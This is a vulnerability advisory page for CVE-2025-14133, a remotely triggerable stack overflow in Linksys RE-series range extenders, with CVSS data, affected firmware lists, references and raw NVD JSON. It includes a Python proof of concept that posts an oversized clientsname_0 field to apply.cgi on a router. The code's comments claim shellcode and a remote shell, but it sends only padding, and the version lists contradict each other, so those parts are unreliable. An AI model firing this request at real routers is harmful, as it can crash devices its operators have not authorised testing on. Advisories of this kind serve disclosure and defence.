CVE-2025-14133

Description

A vulnerability was found in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. Affected by this vulnerability is the function AP_get_wireless_clientlist_setClientsName of the file mod_form.so. Performing manipulation of the argument clientsname_0 results in stack-based buffer overflow. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linksys:re6500_firmware:1.0.013.001:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re6500:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:linksys:re6250_firmware:1.0.04.001:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re6250:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:linksys:re6300_firmware:1.2.07.001:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re6300:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:linksys:re6350_firmware:1.0.04.001:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re6350:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:linksys:re7000_firmware:1.1.05.003:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re7000:-:*:*:*:*:*:*:* - NOT VULNERABLE

Linksys RE6500 固件 < 1.0.013.001

Linksys RE6250 固件 < 1.0.04.001

Linksys RE6300 固件 < 1.0.04.002

Linksys RE6350 固件 < 1.1.05.003

Linksys RE7000 固件 < 1.2.07.001

Linksys RE9000 固件 < 1.0.013.001

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-14133 PoC - Linksys RE6500/RE9000 Stack Buffer Overflow
AP_get_wireless_clientlist_setClientsName Function
Note: This is for educational and authorized testing purposes only
"""

import requests
import sys

TARGET_IP = "192.168.1.1"  # Router IP
TARGET_PORT = 80
PAYLOAD_SIZE = 1024  # Overflow payload size

def create_exploit_payload():
    """Generate overflow payload"""
    # Shellcode for MIPS architecture (Linksys device)
    # NOP sled + shellcode + return address
    padding = b'A' * PAYLOAD_SIZE
    return padding

def exploit_cve_2025_14133():
    """Exploit the buffer overflow vulnerability"""
    url = f"http://{TARGET_IP}:{TARGET_PORT}/apply.cgi"
    
    # Payload for AP_get_wireless_clientlist_setClientsName
    params = {
        "clientsname_0": create_exploit_payload(),
        "submit_button": "Wireless_ClientList",
        "change_action": "gozila_cgi"
    }
    
    try:
        print(f"[*] Sending exploit payload to {TARGET_IP}...")
        response = requests.post(url, data=params, timeout=10)
        print(f"[*] Request sent. Status code: {response.status_code}")
        print(f"[*] Check if shell is available on target")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_IP = sys.argv[1]
    exploit_cve_2025_14133()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14133
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14133
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14133/
[4] VulDB https://vuldb.com/cve/CVE-2025-14133
[5] https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_62/62.md
[6] https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_62/62.md#poc
[7] https://vuldb.com/?ctiid.334522
[8] https://vuldb.com/?id.334522
[9] https://vuldb.com/?submit.697980
[10] https://www.linksys.com/
[11] https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_62/62.md
[12] https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_62/62.md#poc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14133", "sourceIdentifier": "[email protected]", "published": "2025-12-06T11:15:46.530", "lastModified": "2025-12-10T18:00:38.753", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. Affected by this vulnerability is the function AP_get_wireless_clientlist_setClientsName of the file mod_form.so. Performing manipulation of the argument clientsname_0 results in stack-based buffer overflow. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linksys:re6500_firmware:1.0.013.001:*:*:*:*:*:*:*", "matchCriteriaId": "92354C9C-D1B2-4143-803D-DE5EF7842184"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:linksys:re6500:-:*:*:*:*:*:*:*", "matchCriteriaId": "52622B22-2E42-443B-81DA-7C42ECCF0564"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linksys:re6250_firmware:1.0.04.001:*:*:*:*:*:*:*", "matchCriteriaId": "70728D67-153A-49FA-80E2-0DE9086DA253"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:linksys:re6250:-:*:*:*:*:*:*:*", "matchCriteriaId": "898FD49F-4225-47FF-822C-9E4FFB5EE192"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linksys:re6300_firmware:1.2.07.001:*:*:*:*:*:*:*", "matchCriteriaId": "1E3A6A93-D598-4F52-808C-EAA45B468066"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:linksys:re6300:-:*:*:*:*:*:*:*", "matchCriteriaId": "25647318-6422-418C-99B8-C806FF490028"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [ ... (truncated)